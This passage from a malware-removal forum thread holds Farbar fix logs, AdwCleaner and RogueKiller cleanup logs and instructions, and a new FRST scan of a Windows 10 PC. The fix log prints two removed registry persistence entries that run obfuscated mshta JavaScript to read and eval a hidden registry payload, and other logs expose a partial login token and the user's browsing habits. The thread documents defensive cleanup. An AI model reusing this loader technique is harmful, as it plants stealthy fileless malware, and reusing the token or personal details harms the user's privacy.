BHO: AVG Web TuneUp -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> No File

CHR HomePage: Default -> mysearch.avg.com
CHR DefaultSearchURL: Default -> hxxps://mysearch.avg.com/search?rvt=1&sap=dsp&q={searchTerms}
CHR DefaultSearchKeyword: Default -> hxxps://mysearch.avg.com
CHR DefaultSuggestURL: Default -> hxxps://toolbar.avg.com/acp?q={searchTerms}&o=1

HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Classes\pdal: "C:\WINDOWS\system32\mshta.exe" "javascript:cCqk8iR0U="9Bm";O53U=new ActiveXObject("WScript.Shell");b5veD1="eq5oh";OoFP7=O53U.RegRead("HKCU\\software\\cllbfyv\\pwgf");pjGqK8X0X="b3xw0t";eval(OoFP7);kwg4nSeU="hwSXwy";" <==== ATTENTION
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Classes\yweguk: cmd.exe /c start "" "C:\Users\Charlie\AppData\Local\Aqiqliqoc\nzaqa.cvex" "javascript:xID4y="x";Tm8=new ActiveXObject("WScript.Shell");uSzMj5PF="dmUa4d40";aD67tp=Tm8.RegRead("HKCU\\software\\cllbfyv\\pwgf");nChf99B="iG";eval(aD67tp);Nrf3hI="6pH7iL3w";" <==== ATTENTION

Task: {03A2E7C8-1339-428F-9323-E99F1976CEB9} - \McAfee\McAfee Idle Detection Task -> No File <==== ATTENTION
Task: {09257EF5-F419-4D7F-BCD8-D2E362191430} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {30E15181-DAE3-4C0F-B9B0-DFDF919EF936} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {3DA21760-C086-4BA7-960C-2C1B98E2C622} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {56271ECE-25BE-42E2-A083-08593745AC10} - \SystemToolsDailyTest -> No File <==== ATTENTION
Task: {5ED329CA-9882-499A-8042-59D048F4FC4A} - System32\Tasks\UninstallDDS-C960901F-CE14-4DE1-9729-1305F719A337 => C:\WINDOWS\TEMP\DeleteFolderTask.exe <==== ATTENTION
Task: {602B3DF8-98F4-4CD6-81E9-42D5939CCFE7} - \PCDEventLauncherTask -> No File <==== ATTENTION
Task: {6064BBC8-744E-477D-B083-93B9E6B7C7D7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {856C1A0B-D1FE-414A-877F-40CC1A262C0F} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {93A65F06-EFE4-4570-9760-03851C229F92} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {95D0914A-38F0-4B8A-BAB5-0591CF1A58CA} - System32\Tasks\{5BAA357C-0979-4040-BFD1-F5B84C2AF43C} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe"
Task: {9F33BB8D-EA5E-4178-A01D-049835D5EA82} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {C5154CA2-F863-4B51-B5D3-BA2AFFD820F9} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {CBEA06BB-9FA1-442E-BA9B-76E01F2756D2} - \PCDoctorBackgroundMonitorTask -> No File <==== ATTENTION

AlternateDataStreams: C:\ProgramData\TEMP:18750BD1 [145]

C:\ProgramData\TR.exe
C:\Users\Charlie\AppData\Local\Uxuve
C:\Users\Charlie\AppData\Local\Eflowubub
C:\Users\Charlie\AppData\Local\Aqiqliqoc
C:\Users\Charlie\AppData\Local\Uwtes
C:\Users\Charlie\AppData\Local\Asjam
C:\Users\Charlie\AppData\Local\Z@!-d255baf1-abe1-4f84-8b12-14150417ad4a.tmp
C:\Users\Charlie\AppData\Local\Z@S!-4d226dde-e80a-4cd1-b594-571eae57a1cf.tmp


EmptyTemp:
*****************

Processes closed successfully.
Error: Restore point can only be created in normal mode.
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Windows\CurrentVersion\Run\\*Svebx<*> => value removed successfully
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Windows\CurrentVersion\Run\\*Qsewipofto<*> => value removed successfully
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value removed successfully
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => moved successfully
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233} => key removed successfully
HKLM\Software\Classes\CLSID\{95B7759C-8C7F-4BF1-B163-73684A933233} => key removed successfully
Chrome HomePage => removed successfully
Chrome DefaultSearchURL => removed successfully
Chrome DefaultSearchKeyword => removed successfully
Chrome DefaultSuggestURL => removed successfully
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Classes\pdal => key removed successfully
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Classes\yweguk => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{03A2E7C8-1339-428F-9323-E99F1976CEB9} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{03A2E7C8-1339-428F-9323-E99F1976CEB9} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\McAfee\McAfee Idle Detection Task => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{09257EF5-F419-4D7F-BCD8-D2E362191430} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{09257EF5-F419-4D7F-BCD8-D2E362191430} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{30E15181-DAE3-4C0F-B9B0-DFDF919EF936} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{30E15181-DAE3-4C0F-B9B0-DFDF919EF936} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3DA21760-C086-4BA7-960C-2C1B98E2C622} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3DA21760-C086-4BA7-960C-2C1B98E2C622} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{56271ECE-25BE-42E2-A083-08593745AC10} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{56271ECE-25BE-42E2-A083-08593745AC10} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemToolsDailyTest => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5ED329CA-9882-499A-8042-59D048F4FC4A} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5ED329CA-9882-499A-8042-59D048F4FC4A} => key removed successfully
C:\WINDOWS\System32\Tasks\UninstallDDS-C960901F-CE14-4DE1-9729-1305F719A337 => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UninstallDDS-C960901F-CE14-4DE1-9729-1305F719A337 => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{602B3DF8-98F4-4CD6-81E9-42D5939CCFE7} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{602B3DF8-98F4-4CD6-81E9-42D5939CCFE7} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PCDEventLauncherTask => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6064BBC8-744E-477D-B083-93B9E6B7C7D7} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6064BBC8-744E-477D-B083-93B9E6B7C7D7} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{856C1A0B-D1FE-414A-877F-40CC1A262C0F} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{856C1A0B-D1FE-414A-877F-40CC1A262C0F} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{93A65F06-EFE4-4570-9760-03851C229F92} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{93A65F06-EFE4-4570-9760-03851C229F92} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{95D0914A-38F0-4B8A-BAB5-0591CF1A58CA} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{95D0914A-38F0-4B8A-BAB5-0591CF1A58CA} => key removed successfully
C:\WINDOWS\System32\Tasks\{5BAA357C-0979-4040-BFD1-F5B84C2AF43C} => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{5BAA357C-0979-4040-BFD1-F5B84C2AF43C} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9F33BB8D-EA5E-4178-A01D-049835D5EA82} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9F33BB8D-EA5E-4178-A01D-049835D5EA82} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C5154CA2-F863-4B51-B5D3-BA2AFFD820F9} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C5154CA2-F863-4B51-B5D3-BA2AFFD820F9} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CBEA06BB-9FA1-442E-BA9B-76E01F2756D2} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CBEA06BB-9FA1-442E-BA9B-76E01F2756D2} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PCDoctorBackgroundMonitorTask => key removed successfully
C:\ProgramData\TEMP => ":18750BD1" ADS removed successfully.
C:\ProgramData\TR.exe => moved successfully
C:\Users\Charlie\AppData\Local\Uxuve => moved successfully
C:\Users\Charlie\AppData\Local\Eflowubub => moved successfully
C:\Users\Charlie\AppData\Local\Aqiqliqoc => moved successfully
C:\Users\Charlie\AppData\Local\Uwtes => moved successfully
C:\Users\Charlie\AppData\Local\Asjam => moved successfully
C:\Users\Charlie\AppData\Local\Z@!-d255baf1-abe1-4f84-8b12-14150417ad4a.tmp => moved successfully
C:\Users\Charlie\AppData\Local\Z@S!-4d226dde-e80a-4cd1-b594-571eae57a1cf.tmp => moved successfully

=========== EmptyTemp: ==========

BITS transfer queue => 7364608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 11898969 B
Java, Flash, Steam htmlcache => 564 B
Windows/system/drivers => 88860292 B
Edge => 2424190 B
Chrome => 349183061 B
Firefox => 68793652 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 9696 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 3306 B
NetworkService => 0 B
Charlie => 348311438 B
DefaultAppPool => 0 B

RecycleBin => 30202249 B
EmptyTemp: => 865 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 17:04:07 ====


Alright let's do a sweep with AdwCleaner and RogueKiller now.

AdwCleaner - Fix Mode

  • Download AdwCleaner and move it to your Desktop
  • Right-click on AdwCleaner.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Accept the EULA (I accept), then click on Scan
  • Let the scan complete. Once it's done, make sure that every item listed in the different tabs is checked and click on the Clean button. This will kill all active processes
  • Once the cleaning process is complete, AdwCleaner will ask to restart your computer, do it
  • After the restart, a log will open when logging in. Please copy/paste the content of that log in your next reply

RogueKiller

  • Download the right version of RogueKiller for your Windows version (32 or 64-bit)
  • Once done, move the executable file to your Desktop, right-click on it and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Click on the Start Scan button in the right panel, which will bring you to another tab, and click on it again (this time it'll be in the bottom right corner)
  • Wait for the scan to complete
  • On completion, the results will be displayed
  • Check every single entry (threat found), and click on the Remove Selected button
  • On completion, the results will be displayed. Click on the Open Report button in the bottom left corner, followed by the Open TXT button (also in the bottom left corner)
  • This will open the report in Notepad. Copy/paste its content in your next reply

Your next reply(ies) should therefore contain:

  • Copy/pasted AdwCleaner clean log
  • Copy/pasted RogueKiller clean log


# AdwCleaner 7.0.4.0 - Logfile created on Mon Nov 13 02:03:54 2017
# Updated on 2017/27/10 by Malwarebytes
# Database: 11-10-2017.1
# Running on Windows 10 Pro (X64)
# Mode: scan
# Support: https://www.malwarebytes.com/support

***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

No malicious folders found.

***** [ Files ] *****

No malicious files found.

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

No malicious tasks found.

***** [ Registry ] *****

PUP.Optional.Legacy, [Key] - HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}
PUP.Optional.ByteFence, [Key] - HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Reason\ReasonByteFence


***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries.

***** [ Chromium (and derivatives) ] *****

PUP.Optional.Legacy, Plugin found: AVG Web TuneUp -

/!\ Please Reset the Chrome Synchronization before cleaning the Chrome Preferences: https://support.google.com/chrome/answer/3097271


*************************

C:/AdwCleaner/AdwCleaner[C0].txt - [9235 B] - [2017/9/15 20:41:38]
C:/AdwCleaner/AdwCleaner[S0].txt - [10282 B] - [2017/9/15 19:32:16]
C:/AdwCleaner/AdwCleaner[S1].txt - [1411 B] - [2017/11/13 2:2:30]


########## EOF - C:\AdwCleaner\AdwCleaner[S2].txt ##########

 

RogueKiller V12.11.23.0 (x64) [Nov  6 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 10 (10.0.15063) 64 bits version
Started in : Safe mode with network support
User : Charlie [Administrator]
Started from : C:\Users\Charlie\Desktop\RogueKiller_portable64.exe
Mode : Delete -- Date : 11/12/2017 21:10:38 (Duration : 00:29:39)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 9 ¤¤¤
[PUM.HomePage] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.bing.com/search?FORM=INCOH1&PC=IC05&PTAG=ICO-e3963092 -> Replaced (http://go.microsoft.com/fwlink/p/?LinkId=255141)
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main | Start Page : https://mail.google.com/mail/u/0/#inbox -> Replaced (http://go.microsoft.com/fwlink/p/?LinkId=255141)
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main | Start Page : https://mail.google.com/mail/u/0/#inbox -> Replaced (http://go.microsoft.com/fwlink/p/?LinkId=255141)
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://dell13.msn.com/?pc=DCTE -> Replaced (http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome)
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://dell13.msn.com/?pc=DCTE -> Replaced (http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome)
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve  -> Replaced (http://search.msn.com/spbasic.htm)
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve  -> Replaced (http://search.msn.com/spbasic.htm)
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Replaced (1)
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Replaced (1)

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 2 ¤¤¤
[Adw.WifiHotSpot][Folder] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HotSpot -> Deleted
[Adw.WifiHotSpot][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HotSpot\HotSpot.lnk -> Deleted
[PUP.Filefinder][Folder] C:\Program Files (x86)\Pluto TV -> Deleted
[PUP.Filefinder][Folder] C:\Program Files (x86)\Pluto TV\locales -> Deleted

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000035f]) ¤¤¤

¤¤¤ Web browsers : 3 ¤¤¤
[PUP.Gen0][Chrome:Addon] Default : AVG Web TuneUp [chfdnecihphmhljaaejmgoiahnihplgn] -> Deleted
[PUM.HomePage][Firefox:Config] 9p71s5n4.default-1495840635264 : user_pref("browser.startup.homepage", "http://www.drudgereport.com/|https://www.washingtontimes.com/|https://www.realclearpolitics.com/index.html|http://dailycaller.com/?refresh=true|http://www.newsmax.com/|https://mail.google.com/mail/u/0/?shva=1#inbox|https://calendar.google.com/calendar/render?tab=mc#g%7Cmonth-3+22844+22881+22857|https://cmx.weightwatchers.com/auth#scope=session%20openid&state=http%3A%2F%2Fcmx.weightwatchers.com%2Fnui%2Fmy-day%3Fmode%3Dfood&id_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IldKZkpkVTlBaDJiS3JzUTE4T2MrOVZFc0s2OD0ifQ.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.MfopEsFTqyIgCcxkK2NQ6dT4Ys3pc5wmRvBkiAvl6zVSu-ovlOyIs8v8Gx-hAio61gvEA8ORCxgfFkvp0E07MFY2z2KLwRusYYtFgqHjtGNK9fKNrPo2xZTJ6Do6gIFeiT8eISlO4FGLg5PUewbdp_0jFHrHtK6XWaZGQXNYv6y_jwbDv38YwzYIzjkSeTVG-683mu3d_UlIoZRVU8sKfFxcN78j7daztpzghV91BKcKSqlq0-dla9LCY8nBkw5K4J44wLMy4ibO0jHrXE9-6cle_tLIAazZS0-DUlCLlE3CqIiE88k4AepU4YwgEqJTBPKENJVWPjOmWz1rVtIeBg"); -> Replaced (about:home)
[PUM.NewTab][Firefox:Config] 9p71s5n4.default-1495840635264 : user_pref("browser.newtab.url", "http://search.htrackyourpackages.co?uid=7422a42f-ecf7-4ce3-957d-c2f0fd6040be&uc=20171109&ap=appfocus1&source=g-ccc1-lp0&page=newtab&implementation_id=package_0.2.0"); -> Deleted

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST1000DM ST1000DM003-1ER1 SCSI Disk Device +++++
--- User ---
[MBR] 316786c695c895c6d6ea4aadd329c9bf
[BSP] 0211a033a7d241948b0a48e3946ada20 : HP|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] DELL-UTIL (0xde) [VISIBLE] Offset (sectors): 63 | Size: 39 MB
1 - [ACTIVE] ACER (0x27) [VISIBLE] Offset (sectors): 81920 | Size: 12014 MB
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 24686592 | Size: 941814 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: Seagate Slim  BK SCSI Disk Device +++++
--- User ---
[MBR] d1b7357981c5b9034afbd0a549d1fed7
[BSP] f744d87ba4a71069fee68694d9e13313 : Empty|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 476939 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
Error reading LL2 MBR! ([1] Incorrect function. )

+++++ PhysicalDrive2: Kingston DT 100 G2 USB Device +++++
--- User ---
[MBR] 52c64e881be552742858015bc1800b65
[BSP] 33a07a59d299ab4ea9f4ab0156f9d86f : Windows XP MBR Code
Partition table:
0 - [ACTIVE] FAT32-LBA (0xc) [VISIBLE] Offset (sectors): 8064 | Size: 15256 MB
User = LL1 ... OK
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive3: SDHC Card +++++
--- User ---
[MBR] 446a14cffee777eeb3d86e89bfa611c5
[BSP] df4f83c1f72e36823a12b0dfc7617313 : Empty MBR Code
Partition table:
0 - [XXXXXX] FAT32-LBA (0xc) [VISIBLE] Offset (sectors): 8192 | Size: 15383 MB
User = LL1 ... OK
Error reading LL2 MBR! ([32] The request is not supported. )

 


Yoan,

I got this same pop-up error message as yesterday:

Error: _WinAPI_CreateFile

Could not open file \\.\PhysicalDrive3
Error: 0
Handle: 0

 

The logs from FRST.txt and additions.txt follow.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 12-11-2017 03
Ran by Charlie (administrator) on CHARLIE-PC (13-11-2017 09:27:35)
Running from C:\Users\Charlie\Desktop
Loaded Profiles: Charlie (Available Profiles: Charlie)
Platform: Windows 10 Pro Version 1703 15063.674 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Safe Mode (with Networking)
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\HelpPane.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8512760 2015-08-04] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411320 2015-08-04] (Realtek Semiconductor)
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [410616 2017-03-13] ()
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [286056 2013-07-30] (Intel Corporation)
HKLM\...\Run: [RtHDVBg_PushButton] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411320 2015-08-04] (Realtek Semiconductor)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3113592 2015-08-25] (Logitech, Inc.)
HKLM\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [239592 2017-10-31] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [AVGUI.exe] => C:\Program Files (x86)\AVG\Antivirus\AvLaunch.exe [302744 2017-10-20] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [DBAgent] => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe [1540896 2015-07-15] (Seagate Technology LLC)
HKLM-x32\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [239592 2017-10-31] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1284680 2014-01-17] (CANON INC.)
HKLM-x32\...\Run: [EaseUS EPM Tray Agent] => C:\Program Files (x86)\EaseUS\EaseUS Partition Master 12.5\bin\TrayPopupE\TrayTipAgentE.exe [256144 2017-09-13] ()
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-09-05] (Oracle Corporation)
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9288408 2016-12-06] (Piriform Ltd)
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [QuickenScheduledUpdates] => C:\Program Files (x86)\Quicken\bagent.exe [77216 2017-11-02] (Intuit Inc.)
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [Uploader] => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe [127816 2015-07-15] (Seagate Technology LLC)
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [1421736 2017-03-28] (Garmin Ltd. or its subsidiaries)
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AdobeCollabSync.exe [763000 2017-03-28] (Adobe Systems Incorporated)
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\PhotoScreensaver.scr [570880 2017-07-11] (Microsoft Corporation)
IFEO\AcroRd32.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\asav.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\dashboard.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\hotspot.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\lastpass.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\lpuninstall.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\turbotax.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass FF RunOnce.lnk [2016-01-21]
